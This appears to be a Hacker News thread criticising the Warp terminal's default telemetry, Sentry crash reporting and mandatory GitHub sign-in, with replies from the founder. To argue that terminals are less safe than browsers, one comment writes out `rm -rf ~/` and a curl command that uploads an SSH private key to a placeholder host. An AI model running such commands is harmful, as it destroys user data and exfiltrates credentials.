Wanted to give it a shot but got disappointed when I launched it and the following happened:
- Outgoing request to googleapis.com
- Outgoing request to segment.io
- Outgoing request to sentry.io
- Requires sign up (only via Github, mind you)
I understand the first request is probably to fetch some dynamic configuration, even though I'd rather my terminal ship with static configuration. But then you have Segment and Sentry: I'm not interested in sending telemetry from my terminal. Finally, having user accounts for a terminal is such a strange concept.
I really wanted to like it, too. The screenshots look great.
I expect my terminal to be a much more secure environment than my web browser. When an application starts communicating with the internet, I have no choice but to treat it with the same level of scrutiny as my browser.
Even making telemetry opt-in means that it has the capability to send information to the internet that I don’t know about, which means that I have to treat it like an application that can do that.
Honestly, this freaks me out. It’s an angle I’ve never considered before. Now I need to make sure my current terminal emulator (kitty) isn’t sending information to the internet without my permission.
Agree, this is a pretty bad deal breaker for me. Big business people doing short-sighted big business things, salivating at cramming a product full of telemetry. All without transparency around it? In a terminal of all things?? Indescribably off-putting and catastrophically damages my trust in the product and the CEO.
EDIT: To be fair, there is some transparency in the original post. I was looking through the landing page for it (where it is not mentioned). Also, imho it should still be opt-in even for the beta. Not everyone is going to read the wall of text to parse out the buried note on telemetry.
This is why I deleted Fig (https://fig.io/) right after installing it. It must've sent some uninstall information, too, because the creator/CEO emailed asking why I uninstalled it afterwards...
Oh yea, Fig is also the one that is Mac only but never mentions that fact anywhere on their website. Everything is written to just presume that the reader is on a Mac.
Their getting started instructions [0] are all just terminal commands too, and even that doesn't mention Mac once.
> Oh yea, Fig is also the one that is Mac only but never mentions that fact anywhere on their website. Everything is written to just presume that the reader is on a Mac.
Not that it is not annoying, it is, but that's pretty common with Mac-only software in my experience.
Every single tool in the console homebrew space, I swear. And it's not like the code isn't portable, it's usually just some command-line / batch thing; but they just don't bother to compile it for anything other than Windows; and then they don't release it as OSS for you to do so, either. The number of things I've had to run under WINE...
Re: big business, we're still pretty small, but it's true that we are trying to build a business around the command line. I get that's controversial, that it's not something that exists today, and that the terminal is a super-sensitive, low-level tool.
We will never ever build a business around terminal data, and to be super explicit, we are 100% not collecting any command inputs or outputs.
The business that we want to build is around making a terminal (or a platform for text based apps) that grows because it makes individuals and teams a lot more productive on the command line.
If there's one thing I've taken away from this Show HN so far, it's that there is a lot of well-founded concern about the terminal and user data, and that we need to do a better job on this issue.
Hey Zach, while I think your post is well-intentioned, the contemporary default level of trust around tech companies and data privacy is just very low. As a new entrant to the field, you inherit the default valuation—people have no other info to go off of.
Given that, it's probably the case that the only options are to either be fully open source or to make a fully offline mode an option.
In any case, I think the concept for your product is excellent—it's been mind-boggling to me that something along these lines wasn't tackled years ago, so I look forward to your guys' future success, hopefully moving the state of terminal interaction into the modern era.
> ...the contemporary default level of trust around tech companies and data privacy is just very low...
It's not just that the level of trust is very low. I shouldn't need to place any trust in the developers of my terminal at all. If I can't know for a fact that it's not acting against my interests, then I'll pass. I already have such a big selection of fully open-source terminals available. Why would I even consider taking any kind of risk with this one?
I can’t speak for you, but generally people at least consider this tradeoff because of the additional utility of the third party tool. Ideally all these features would exist in the system terminal, but that hasn’t happened, and it possibly won’t ever.
As much as I can appreciate the community's reaction to your approach of default collection of telemetry, I can also equally appreciate you and the rest of the team sucking it up and accepting the feedback. Thanks for that, and I'm personally interested to see where you're able to take Warp. I think there's something potentially pretty compelling here.
My advice here would be to simply make telemetry opt-in during the beta period. I'm typically pretty liberal about opting in to telemetry (particularly when the extent of it is documented), but obviously a lot of your users will not be. Your desire to accelerate your progress seems to conflict with the needs of your target demo, and I think this warrants adjustment.
If the code is there, it is potentially exploitable. So, opt out is nowhere near good enough. If it can send to remote hosts, this can be abused. This capability should not be there, at all.
I am not conflating the two. If the terminal can run programs connected to the internet, then the terminal has internet connectivity. The host system would not be able to tell the difference.
Warp could certainly promise not to include any phone-home functionality in their code, but unless it's open-source and everything is audited, it could easily call the host system's HTTP client and still phone home.
> If the terminal can run programs connected to the internet, then the terminal has internet connectivity.
Is this true? This sounds wrong to me, but I don't know the inner workings of terminals. The terminal just executes programs and handles pipes, it seems. A terminal can be completely walled off from the internet, and when you execute something from it, say, curl, then curl has its own memory space and access layer outside the terminal, and just has its stdio wired to the terminal.
> The terminal just executes programs and handles pipes, it seems. A terminal can be completely walled off from the internet, and when you execute something from it, say, curl, then curl has its own memory space and access layer outside the terminal, and just has its stdio wired to the terminal.
As I said in my comment, even if you "wall" the terminal off from the internet, if it can make system calls on behalf of the user, it can still access the internet.
If a terminal has sufficient access to the host system to call `curl https://www.google.com` on behalf of the user, then it can call it without any user input.
There is nothing on the host machine that can authenticate system calls coming from the terminal application as "user-initiated" or not. This is similar to the warning that "you can't trust the client"[1].
You're technically correct here due to some sloppy wording, but this isn't the point that everyone here is trying to make. We know our terminals can connect to the internet; we just don't want them to do that without being instructed to. If our terminals randomly curl'd websites (as opposed to delivering telemetry to a 3rd party), I'm sure the reaction would be similarly displeased.
And what I'm saying is that there's no way to set a terminal's permissions on the host system such that it can access the internet on behalf of the user but cannot access the internet on behalf of its creators.
This is a human problem, not a software one. Your terminal is as trustworthy as its creators. It cannot be locked down to prevent telemetry and still be a useful terminal. That was my original point and it is still true.
No one should use a for-profit terminal emulator, especially one created by a VC-backed startup, full stop.
If they actually listen to our feedback, remove forced telemetry, and remove sign-in in the next release, then I'd be happy to give their product another chance.
Although there's no guarantee they won't turn evil at some point in the future...
Profit motive means that even if they do that now, they're incentivized to collect data in the future. From the standpoint of investors, leaving that revenue stream on the table would be dumb, considering every other company in tech spaces draws revenue from collecting their customers' data.
If a company is committed to never spying, then they'd have no problem making such terms contractually binding on their end. Companies that say they're against spying, but leave the option to collect their users' data open for the future, aren't really committed to not spying.
Wanting to collect usage information and errors isn't evil-by-default. It's incomparably useful for troubleshooting and improving. Absolutely nothing works better, it's the best by a ridiculously large margin.
But yeah, terminals are very sensitive environments, opt-in should be a default even at launch.
> Absolutely nothing works better, it's the best by a ridiculously large margin.
Is this really the case? It seems that to find mistakes in software for various interaction patterns, truly exhaustive automated tests would likely work far better by various measures (coverage, reliability, reproducibility, reusability etc.) and at the same time do not have the extreme downside of privacy invasion. For example, see a section from the Age of Empires Post Mortem https://www.gamedeveloper.com/pc/the-game-developer-archives... :
"8. We didn’t take enough advantage of automated testing. In the final weeks of development, we set up the game to automatically play up to eight computers against each other. Additionally, a second computer containing the development platform and debugger could monitor each computer that took part. These games, while randomly generated, were logged so that if anything happened, we could reproduce the exact game over and over until we isolated the problem. The games themselves were allowed to run at an accelerated speed and were left running overnight. This was a great success and helped us in isolating very hard to reproduce problems. Our failure was in not doing this earlier in development; it could have saved us a great deal of time and effort. All of our future production plans now include automated testing from Day One."
No data on this but instinctively it seems, given alternatives, most people abandon some buggy software rather than patiently reporting problems and waiting for it to get better.
Yeah. User reporting has a very obvious and very strong survivorship bias. Plus the people who take the time to send in a report are a rather small niche, so you have pretty strong bias even if you exclude people who leave.
Always-on metrics are massively higher quality data. They don't collect the same kind of data in many cases, but they can reveal a lot of things that never get reported. They also don't suffer from the well-established pattern of people not accurately reporting their own behavior when asked / polled (stronger when asking about future behavior, but it applies in all cases).
In production, agreed. In beta, I'll accept it. I feel that the term beta gets abused a lot, but in what I believe is its proper meaning, there are a lot of inherent factors both parties are agreeing to: increased risk of error and data loss, and debugging flags that generate more data for the singular purpose of improving the product. That's exactly what should be in the privacy policy and explicitly stated upon install. Anything short of that puts me firmly in the hell-no category with you.
With you here on this. Telemetry is a really important concern and I get why people don't like it, but fundamentally the expectations on a beta product surely have to be different in that. The thing is still in development.
I'm with you on not sending data, but have you ever read user reports? If you get any (most won't report), they likely won't have enough information to reproduce or fix.
It is evil by default. Paying beta testers, or giving them a free, opt-in version with telemetry is the ethical route. Being ridiculously, over the top clear about exactly what you snarf off the end user is the ethical route.
You are not entitled to access my machine, and that shouldn't be casually dismissed with "don't worry, we're not doing anything bad." You're creating potential vulnerabilities, and by implementing identifiable patterns, reducing the security of your users.
You shouldn't spy on people, and when you do, it's wrong. Remotely inspecting people's behavior is spying.
Your software doesn't need to phone home. It doesn't need automatic updates. You don't need to spy on people to develop good software. That's toxic nonsense.
Telemetry is just the cheapest and most convenient option for business owners, and not necessarily the best option when it comes to improving customer value and experiences.
Case studies, focus groups, surveys and interviews are great ways to determine usage patterns and problems with products and services. Of course, you'd need to pay users to participate in them, and then you need to pay expensive employees to conduct, collect and analyze the results. Spying is cheaper than doing any of that.
I agree both that telemetry is useful and that there's not necessarily a place for it in the tool I use to manage my workstation and hundreds of servers. Perhaps I'd opt in to a middle ground, that is collect telemetry locally into a support file I can review, evaluate, and potentially redact before submission.
> Absolutely nothing works better, it's the best by a ridiculously large margin.
Then why is the telemetry-encrusted modern Windows a usability fail, even compared to past versions of Windows which relied on extensive in-house user testing?
Usually the practice in these scenarios is to try out all possible ways to make money, and then walk it back a little once the public outcry is big enough. At some point you find the most profitable balance, before you've driven away all your customers.
There is a plethora of free GPU-accelerated terminals. Alacritty, kitty, foot, wezterm, etc. None of these as far as I know send telemetry data. I see no reason to think that a new terminal is going to make money somehow by finding a balance.
My comparison was about the business models of these "evil" cases in general, not about terminals particularly. In general, free apps need to find a balance between how much "exploitation" users will tolerate and how much they get from the app, if the app maker wants to make some money.
I don't personally see any reason to swap my terminal for one with telemetry. One of my worst fears is that some day I'll be forced to.
The problem with telemetry data is that sometimes you can accidentally collect sensitive data without realising it. I know one library on iOS was collecting the coordinates of all touch events. However, that meant it was collecting the coordinates of all touches on the keyboard, which made it possible to reconstruct user input into password fields.
As the author of the post (and founder of the company), I think this is also a very reasonable concern. It's one that we have as well and that we take very seriously.
However, I do believe pretty deeply that every app has the potential to be much more powerful if it leverages the internet and I think the terminal is not an exception. I stand by that but get that it's a paradigm shift.
Please keep the feedback coming though - it's helpful to understand how you think about it.
> However, I do believe pretty deeply that every app has the potential to be much more powerful if it leverages the internet and I think the terminal is not an exception.
But that’s exactly it. A lot of people on here, including me, do not agree that _every_ app has that potential. In fact many believe that internet connected apps are unnecessary for many things. There is strong evidence against this if you just look at the number of “secure” systems that have been hacked over the decades. While you may capture a large audience with your internet-first terminal “app”, who honestly don’t care about this stuff while at work, you will get pushback from HN and somewhat+ privacy concerned devs.
As a user, I can see the potential, sure. But it's not realized in any way. Right now this terminal uses Internet only for collecting my data (GitHub account, telemetry, and more).
The value proposition is negative. A paradigm shift, sure, but IMO in wrong direction.
> I expect my terminal to be a much more secure environment than my web browser.
Wat? Your terminal is 1000x less secure than your browser. Your terminal can run `rm -rf ~/`. Your terminal can run `curl -F 'data=@~/.ssh/id_rsa' https://bad.com`, and those are just 2 of 1000s.
JS on your browser can do none of those.
Maybe you meant to say you want apps running from the terminal to not phone home but nothing in the terminal prevents that.
That's security vs. safety. You're pointing out that a terminal allows the user to perform actions that could be unsafe. Those actions, or JS in the browser, become a security risk when they happen without the user's awareness or consent.
Nonsense. The terminal is a place where you run software. Every piece of software you run in the terminal can do all kinds of nasty things to your system and steal info.
The browser is also a place to run software. There, that software cannot do anything to your system, nor can it steal any data.
I'm not sure I'm ready to have SaaS models replace core utilities and tools locally.
> Announcing Warp’s Series A: $17M to build a better terminal
And just thinking about this... it's not clear to me what their moat will be, as I suspect that if there's a really compelling feature it will be available in OSS terminals quite quickly. Perhaps it's the product polish? But I'm not sure polish is what I want from a terminal; at least, it's not the top thing I want.
I wondered the same. Then I realized it sends out requests to googleapis, segment, and sentry. Imagine having data on every dev's terminal workflow? Ca$h.
A lot of workplaces don't even bother to ban grammarly, which is literally a keylogger*, this won't even be on their radar.
* I feel compelled to point out that Grammarly disagree with this definition because it doesn't send every single keystroke, just the ones in non-password text boxes.
If my plugin Passwordly, only sends the keystrokes inside password boxes, is or isn't that a key logger? It's only capturing a subset of your input, like Grammarly, so not a keylogger?
If the argument is, it's not a keylogger because it's not logging sensitive information, well I type plenty of sensitive information into non-password textboxes.
I’d say passwordly also isn’t a key logger. By your definition every text editor would be a key logger. That may be the strict definition of a key logger but the commonly accepted meaning is different. A keylogger logs all keys regardless of the app being used or general use case. Often they are malicious as well but that doesn’t have to be the case.
I doubt their compelling features will be in OSS terminals any time soon. I’ve wanted a terminal that has a decent multi line editor for years, and there’s nothing out there.
Vim supports multiline editing and I'd imagine emacs does as well.
In bash/zsh, <ctrl-x ctrl-e> opens up $EDITOR so you can use whatever you're accustomed to anyhow.
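In bash this binding works out of the box via readline; in zsh the equivalent widget has to be loaded and bound first. A minimal sketch of the zsh side (the `^x^e` keystroke is just the conventional choice, to match bash):

```shell
# ~/.zshrc — make Ctrl-X Ctrl-E open the current command line in $EDITOR,
# the way bash's edit-and-execute-command does:
autoload -Uz edit-command-line
zle -N edit-command-line
bindkey '^x^e' edit-command-line
```

On save-and-quit, the edited command is placed back on the zsh command line.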
Most of these features are already available if one spends a bit of time configuring their terminal/shell.
I use the visual-multi plugin [0] all day in vim/neovim.
I don't like using tons of plugins, but multi-cursor with selective invocation like the ctrl-d of Sublime etc. was the main thing I missed when moving to vim. (I use visual block mode too, but it's not the same thing.)
They are very useful! As a long-time Vim user who switched to Kakoune[0] a while back, I didn't even realize I needed a good multiline cursor from my editor before I tried Kakoune. Highly recommend it!
If you need to pass lots of arguments to a command, it's super useful. Typically I don't do this because it's quite unwieldy with a standard readline editor, but I could if multiline editing were available!
While this can be done in zsh/bash, it takes investment to understand how to use multiline specifically. And then once you leave the terminal, the same keystroke does not do anything for you.
One of the nice things about Warp is that you don't have to think twice about it, because it behaves similarly to text fields everywhere else on your computer.
In the terminal, I often have the feeling that personal computing revolution from Xerox PARC & Apple Computer never happened.
This works in everything that uses libreadline to accept user input (unless the binary has specifically configured the library differently, iiuc), so it should work in all shell-like interfaces. You can customize the shortcuts in inputrc, likewise, for all libreadline-using binaries. By default, readline tries to be emacs-like. You can ask it to be vi-like, or reconfigure lots of its shortcuts to be similar to an editor you like. To be fair, "escape to real editor" is not a thing you usually do in an editor, so that will remain special.
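As a sketch, a few ~/.inputrc lines like these apply to every readline-linked program at once (bash, python, psql, and so on); the specific options below are just illustrative choices, not recommendations:

```shell
# ~/.inputrc — read by every program linked against GNU readline
set editing-mode vi            # vi-style line editing instead of the emacs default
set show-mode-in-prompt on     # show an indicator for insert vs command mode
# Make Up/Down search history for entries matching the already-typed prefix:
"\e[A": history-search-backward
"\e[B": history-search-forward
```

Changes take effect in new sessions, or immediately in bash via `bind -f ~/.inputrc`.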
This stuff has been in the major shells for years, through excellent editor integration. For emacs and vi it's pretty much free. If you want to integrate with a different editor, it's totally doable.
Most of the stuff the sibling comment is referring to centers around the 'edit-and-execute-command' feature in bash. There is a similar incantation for zsh.
If I open an editor then my scrollback history isn't visible (or is in a separate window). Maybe vim and emacs offer this, but that's a big commitment just for a terminal. Warp has GUI-grade editing (mouse support, etc) with things like multiple cursors in a very nice interface.
In emacs a shell is like a text buffer where you can simply search or move around as you would do in a text file. To get command history you'd just execute `history` and then ctrl+s (find) it, or move to it with the cursor.
Normally I would pull the command I need multi-line editing for back from shell history, using the search operator '!' and print predicate ':p' before invoking bash's 'edit-and-execute-command' on it. I suppose while in the editor then I might need history again, but I can't recall it being an issue.
I love how my previous comment is downvoted with no answer, by (I assume) bash and zsh fanboys, when these kinds of features are barely used by users because they can't be easily found.
Use something like fish to see what real feature discoverability for a shell looks like.
And I say this as a zsh user that has waded through the mountains of obscure documentation to set it up. Don't fall into Stockholm syndrome and think that if you went through hardship, others should, too.
99% of bash/zsh discussion threads are someone going: "here is awesome feature I found" (where frequently that feature is something that should have been painfully obvious to notice) and then 100 replies: "that's so cool and useful, I never knew about it and I've been using bash/zsh for N > 5 years".
I have no idea who downvoted you or why they did so. I'm seeing your reply for the first time. From what I can see, our priorities in our tools are different. Discoverability and widespread use of particular features are not near the top of my list. I have read the bash manual. For the tools I use most, I've found it to be a good investment, that has paid me great dividends.
Doesn't `set -o vi` do this for you? Place it in .bashrc and you're good to go.
It's great to use this with awesomewm for windows management, and vimium for browser control.
Then you can develop in vim, bash in vim, browse in vim, and switch windows with vim. You don't have to learn 10 different, unintuitive, and ridiculous hotkeys for each different program or level.
FWIW, the Warp terminal will be free for individuals. We would never charge for anything a terminal currently does. So no paywalls around SSH or anything like that. The types of features we could eventually charge for are team features.
Our bet is that the moat is going to be the team features, like:
- Sharing hard-to-remember workflows
- Wikis and READMEs that run directly in the terminal
- Session sharing for joint debugging
Our bet is that companies are willing to pay for these. BTW, even these team features will likely be free up to some level of usage and only charged in a company context.
> The types of features we could eventually charge for are team features.
You can probably maximize community acceptance if you provide clients that do not use these features as actual FOSS and only start incorporating closed-source pieces for those features. With things like client keys etc to restrict server access.
A bit like the Chrome/Chromium thing was intended initially.
Those get codified into ansible and deployed on CI/CD pipelines. This is an anti-feature. The day that someone suggests using a terminal to manage hard-to-remember workflows is the day I start a huge crusade to fix whatever process led to introducing yet another tool.
> - Sharing hard-to-remember workflows
= Make better scripts and put in CI
> - Wikis and READMEs that run directly in the terminal
No thank you
> - Session sharing for joint debugging
= That's more for development.. not for shell access
> Our bet is their companies are willing to pay for these. BTW, even these team features will likely be free up to some level of usage and only charged in a company context.
I actually don't want them. I migrated from many apps that do too much to apps that do one thing really well.
(Not affiliated with Warp but care about this particular thing)
Shell scripts imply, well, a particular shell. If everyone is on similar OSes, maybe that works for you, but as a Windows user, "pile of bash scripts" might as well mean "doesn't work." I use a terminal for my daily work, but don't have bash installed on my machine.
That said, I haven't tried Warp yet specifically because it's Mac-only right now. Even within that context, Warp integrates with Bash, Zsh, or Fish, which do have their own extensions to POSIX shell, but at least you can rely on Bash being installed.
That would also now force everyone to use this proprietary product instead of whatever they're familiar with.
For mac <-> linux, posix-compliant scripts mostly work in my experience but you have to account for different versions of gnu utils. For linux <-> windows, if it's small you could just write a powershell script, or use something like python on both, no?
I fail to see how these features are nice enough to force people to use a proprietary terminal that, for now, is compatible with existing bash/zsh shells.
Yes, that is true, but it does seem like that's what their strategy is. If you're using these collaboration tools at your job, you'd have to be using the product already. So that's less of a problem than it would be for say, scripts included with some sort of open source project.
My point is mostly that shell isn't cross-platform, and this is one way you could address that. But it's not a generalized solution, absolutely.
(and yeah, something like Python is better than trying to keep multiple of the same scripts in different languages, for sure. You can do it if you wanted though, if they're small and you're willing to commit to it, I'm not sure I've ever seen it really pulled off.)
Basically every operating system has a POSIX shell by default except Windows, but it has been ported there multiple times, Samba has existed for decades, and WSL is on the rise. It may sound a little more irritating, but they deserve it for still running Windows :p /hj
(besides you can just host an ssh server)
I mean, I could also tell you "Just download and run PowerShell, it's ported to Linux", but you also know that would make you feel like a second-class citizen, because you know it's not something as good as something that actually works on your platform in a real sense.
Why would it be easier to port Warp to a new system compared to Bash, Python, Perl, etc.? These tools are widely used to automate workflows and are already ported to any system you would probably care to develop on.
So programs/workflows written in Warp will be portable without much effort, in some way that an equivalent shell or python script isn't? Why do you think that?
Ok, maybe I misunderstand what a "workflow" is. Since we are talking about replacing shell scripts with "workflows", I assumed that they are a kind of programming facility of about similar power as shell scripts. But that may be incorrect.
> You aren't the one porting Warp, but you are the one porting the shell script.
It sounds like you are saying something like "Warp scripts/workflows require almost no effort to port, compared to the shell scripts they replace." I was interested to learn how this can be the case. Perhaps my interpretation was wrong.
I may also be too; like I said, I haven't used Warp yet. Just read their docs. "Workflows" are described in their docs as effectively 'aliases with better docs that integrate with a search bar', and are defined in a YAML file. They don't actually show said YAML file, so I don't know how complex they are. If they give you the full power of the underlying shell, then yeah, you're back at the exact same problem, but if it's stuff like "invoke this program with this set of arguments," which is what their examples seem like, then I'd expect it to work with any shell as long as that program is installed.
> Perhaps my interpretation was wrong.
And perhaps mine is. The docs aren't in-depth and I don't own a Mac. But really, ultimately, "are workflows more portable" isn't a question I personally am wed to; it's that "shell scripts are only portable via UNIXes and there's a much bigger world out there" that I am, and I am hoping that workflows are more portable than shell scripts. In practice, they may be, or they may not be, but since they're in a layer above the shell, it's possible that they're not shell-specific.
That's a great question! Version controlled shell scripts are very useful (and in fact workflows in Warp can also be version controlled) but they still have a few problems:
1) Documentation--when a repo has a lot of shell scripts, it can be very difficult to know which command to run in certain situations. Even if each shell script has documentation, there's no way to find that documentation natively from the terminal itself.
2) Searching--you can only execute commands from the terminal based on the shell script name but there's no easy way to search for a script based on _what_ it does or any other metadata.
It's just.. an incredibly bad look to have this be the top comment on a post about this while the website claims that "cloud stuff" is opt-in.
It's more essential to be honest about this during the beta period than after, so "oh it will be opt in" is a cold comfort, alongside the approximately never-true "we'll open source it some day."
Not touching this with a ten foot pole. Not for something as essential to my day to day work as a terminal.
Further down in the thread, they claim that Warp is nearly as fast as Alacritty. Then a user points out that it isn't even close and their response is basically, yeah, we know that. We want to fix it.
How does a company expect lying on HN to work out well for them? I'm sure they're doing their best, and are excited about their launch. But they are coming off as so shady because they're trying to fool people.
If they really wanted to be open source but don't accept contributions at this time, setting up a read-only mirror with a proper FOSS license would be a good way to do that.
Opt-in refers to anything that sends any contents of a terminal session to our servers (as opposed to telemetry which is metadata and never contains any terminal input or output). But we hear the feedback and appreciate it.
"Private & Secure:
All cloud features are opt-in. Data is encrypted at rest."
While you might have some wiggle room to say that telemetry is not a "cloud feature", logging in with github is absolutely a cloud thing and it's not really opt-in if you can't use the software without literally identifying yourself to a cloud service.
You should at the very least remove that text from your front page until you're out of beta and it's actually true.
And that's ignoring the fact that there's no victory in splitting hairs over the definition of cloud stuff to pretend you're not walking a very fine line.
Zach, this telemetry approach is fine for Google Docs retail users but Warp's target customers are some of the tech savviest people on the planet. They are going to hold Warp to much higher standards of security and privacy.
Second, your user onboarding has too much friction with mandatory Github logins. You need an advisor / product manager who can guide you better when making these "human" decisions.
Because you posted directly to HN and clearly want to show this audience the value of your work, I expected a somewhat different reply to this critique.
A more user-centered reply might have been to say you understand the confusion and will look into making this truly opt-in with the team. I think the strong message you're getting from this community—who is, after all, your target audience—is that before sending any data (whether you choose to label it telemetry, tracking, diagnostic data, or otherwise), you should explicitly ask in the terminal itself whether the user finds this acceptable.
I don't want to put down an effort with seemingly good intentions like this one, so please take this engagement in the spirit it was given.
I was confused by your wording, but I think this section of the link is very relevant:
>When Warp comes out of beta, telemetry will be opt-in and anonymous.
>But for our beta phase, we do send telemetry by default and we do associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong.
I highly doubt anyone reads that. I think the only way to be up-front about it is to have an annoying pop-up that with a button that says "OK YOU CAN SEND TELEMETRY" that must be clicked before proceeding.
To be fair, I think HN is a collection of outliers when it comes to caring about network activity caused by running programs. Most devs will probably just be happy that the tool provides a lot of value.
No way this is GDPR compliant. A mandatory Github login sends data to US servers. Even with the usual additional standard contractual clauses, it is at least disputed whether this would hold up in a CJEU trial.
Twilio, the owner of Segment.io, is also a US company and will receive individual-related telemetry data, which likely violates the GDPR.
As the author of the post, I think this is totally reasonable feedback and something we have discussed quite a bit on the team.
The general stance on telemetry that we have is that
a) we are just starting and it's really helpful to see which of our product ideas are useful to our users (e.g. does anyone use AI Command Search? Should we continue to invest in it)
b) we tried to be very explicit about what we are and are not sending - it is only metadata and never command input or output (you can see the full list of events we track here: https://docs.warp.dev/getting-started/privacy#exhaustive-tel...)
c) if you aren't comfortable with telemetry, then please don't use the product just yet - we will make telemetry opt-in when we have a large enough sample size that we can be confident extrapolating what's going on
For googleapis - this is for login. We use firebase as our auth provider.
For segment - this is for telemetry, as you point out.
For sentry - this is for crash reporting.
As for why we have accounts, it's because we are starting to add features for teams and it's important in that context that there is some type of identity associated with the user.
But like I said at the start - the feedback is totally reasonable and we are trying to figure out how to balance concerns here while still being in a good place to iterate on and improve the product.
As a Sentry user (for a web app where people are not placing sensitive IP!) - it is INCREDIBLY easy for it to be configured to suck up massive amounts of PII and sensitive IP in the context of its crash reports. If I am running `kubectl create secret --from-literal` and something crashes, can you guarantee that the contents of that command will not be loaded into Sentry? Breaching this guarantee would be as simple as having some code somewhere in your stack (including a parsing library) format an Error with the command contents, miles away from anything Sentry-specific.
I'd be much more trustful of your product (and indeed, I do desperately need a better terminal!) if you were to:
- make Sentry crash reporting opt-in (or at the very least have a popup that occurs with the content of what will be sent to Sentry before anything is sent to Sentry), AND
- clarify in your event telemetry documentation, and explicitly in your Privacy Policy, that ONLY the event ID/name, timing, and the user ID are sent to Segment, nothing else.
But I simply cannot use a terminal where my keystrokes might be logged to anyone's Sentry or Segment account - even if it were our company's own Sentry account. The risk of partner-entrusted credential leakage into an insecure environment is simply too high.
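To illustrate the parent's point: Sentry's SDKs do let you intercept events before they leave the machine (via a `before_send` hook in the Python SDK, for example), but scrubbing is deny-list based and easy to get wrong. Here is a minimal sketch of such a scrubber — the patterns and event fields are illustrative assumptions, not a complete or production-ready deny-list:

```python
import re

# Patterns that commonly leak secrets into exception messages or
# breadcrumbs. Illustrative only; a real deny-list would be far longer.
SECRET_PATTERNS = [
    re.compile(r"--from-literal[=\s]\S+", re.IGNORECASE),
    re.compile(r"(?i)(api[_-]?key|token|password|secret)[=:]\s*\S+"),
]

REDACTED = "[redacted]"


def scrub(text):
    """Replace anything matching a known secret pattern with a placeholder."""
    for pattern in SECRET_PATTERNS:
        text = pattern.sub(REDACTED, text)
    return text


def before_send(event, hint):
    """Hook of the shape sentry_sdk.init(before_send=...) accepts:
    scrub log messages and exception values before the event is sent."""
    if "logentry" in event and "message" in event["logentry"]:
        event["logentry"]["message"] = scrub(event["logentry"]["message"])
    for exc in event.get("exception", {}).get("values", []):
        if exc.get("value"):
            exc["value"] = scrub(exc["value"])
    return event
```

Anything these patterns miss still leaks, which is exactly the problem: the guarantee depends on anticipating every way a secret can end up in an error string. For a terminal, opt-in reporting with a preview of the exact payload is the only safe default.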
> - make Sentry crash reporting opt-in (or at the very least have a popup that occurs with the content of what will be sent to Sentry before anything is sent to Sentry), AND
100% this. I don't entirely understand why Warp needs to connect to Sentry right at application launch. If it crashes, capture that crash and present me an opportunity to report it or not. If I do agree to report it, first present me the complete text of everything that will be reported.
I understand that this puts some hurdles in the way of getting crash reports. But terminals frequently contain information far too sensitive to trust with these things being automated.
You can use the Firebase login tools without the person identification stuff pulled in. Note that for companies failing to do this in a privacy respecting way, a savvy user can usually get granular at the firewall and get the login to work without the audience reporting. Which means you could…
Similarly, in my book, segment.io isn’t just “telemetry” so much as it’s killer feature of cross app audience persona correlation, so less about what’s up with the app, more trying to learn more about the users without asking them. If you were instrumenting the app UX and not trying to see who is using you, there are other choices.
A number of ways to do accounts that can leverage a person’s own IdP or other approaches where you don’t have to have accounts, e.g. most any channel the team or group can access will do to get in sync on a session start.
Regardless, and even if GitHub and e.g GitHub Orgs are your way, all of them should be optional since not everyone is desperate to team their cli.
Last, and sorry to put it like this, if you’ve “discussed it quite a bit” as a team, I’m not sure but maybe that gives me less confidence in your respect for security, privacy, and users.
I’d imagine that deliberate discussion backed by respect for your users and team know-how should have resulted in a different set of choices.
> Warp is a blazingly fast, rust-based terminal reimagined from the ground up to work like a modern app.
Well, at least they didn't lie.
As for my personal position: I want fewer products in my computing environments, not more. I hope more people would ponder the possible ramifications of going in the opposite direction.
I'm not sure I care very much about which piece of software is a "product" or not (I have no qualms with devs asking for money), but I definitely agree that calling a piece of software "modern" actually carries negative connotations nowadays. I think most would agree that apps developed within the last 4 years are often more resource-intensive and slower than the equivalents from 15+ years ago.
Warp looks really cool as a tool and I intend to try it as soon as it's available on Linux, but it was pretty bold of them to include outgoing network requests by default before presenting directly to HN. I saw the post about "everything is opt in, where 'everything' means 'sending terminal contents'" - as if people read privacy policies before trying out a new dev tool.
We exist, but it's complicated. A complete solution has more edge cases than what "stacks" have tools to work with. My gut feeling is that the contemporary approach to solving information problems is crazy nonsense. I'm working on something to prove myself wrong. If I'm not, I'll make something available for a fee.
Yeah. From a developer's standpoint, my terminal is the one sacred thing I have left. I'm certainly not going to use something that is going to randomly break or make external calls every time I open it.
I nearly also used the word “sacred” in my comment above.
I gave up MacOS for Linux because I felt like Apple wasn’t letting me operate my own computer anymore. Even Ubuntu has eroded the transparency and control I have over my computer over the last decade, at least that’s my perception.
I feel like the only part of my computer that I understand anymore is what happens in the terminal.
I don’t categorically hate having magic happen on some remote server that makes computing easier for me in some way… but I really need to have a space that I understand and control and — over time — that place has slowly been compressed into the command line.
> Wanted to give it a shot but got disappointed when I launched it and the following happened
Yup, well, that's what happens when you take money from VCs or other third party investors, you need to monetise / demonstrate ROI / need numbers for your investor slide-decks.
I'll stick to my old-fashioned spyware free terminal thanks very much. Why overcomplicate things that don't need to be complicated.
Yep. In my last project one of the key USPs was privacy. The product vision was built around it and it was fundamental to our positioning in the market.
But I made the mistake of letting investors share executive control of the company, and pop there goes the pro-privacy policy.
In defence of founders everywhere, however, I will say that the investors didn’t just say “no”. They strung me along for almost a year, insisting we would be meeting about it, recording decisions where we apparently agreed, even pointing out those decisions while they flagrantly violated them in practice.
So who knows what’s happened here. A lot of the messaging sounds like what happened to me. “Yes we know privacy is important and in the future mumble mumble.”
Yea, I would never use a terminal that does any of that. If you want logging and crash reports, use Breakpad or something similar to send the crash report after a crash. No need to have telemetry reports going all the time.
In addition to crashes, we also want to know things like: which features people are using so we can invest more in them, and how much people are using the app so we know if we're doing a good job.
Totally understand if you're not comfortable with that though! It will be removed when Warp is out of the beta test.
I know it sounds logical to you, but the further down that road you go, the worse your software will be in the end. Make software with a coherent vision and you can pick and choose features based on how well they fit that vision, without needing to spy on your users or turn it into a popularity contest.
Incidentally, you might be interested to know that in the last 8 hours my comment has gotten 25 upvotes; that’s a lot of lost customers.
I don’t mean that my comment cost them customers, only that the upvotes on my comment measures the customers they had already lost by using pervasive telemetry.
It just results in losing infrequently used but important features. First it gets moved from a button to a menu, then to a sub-menu, and eventually removed.
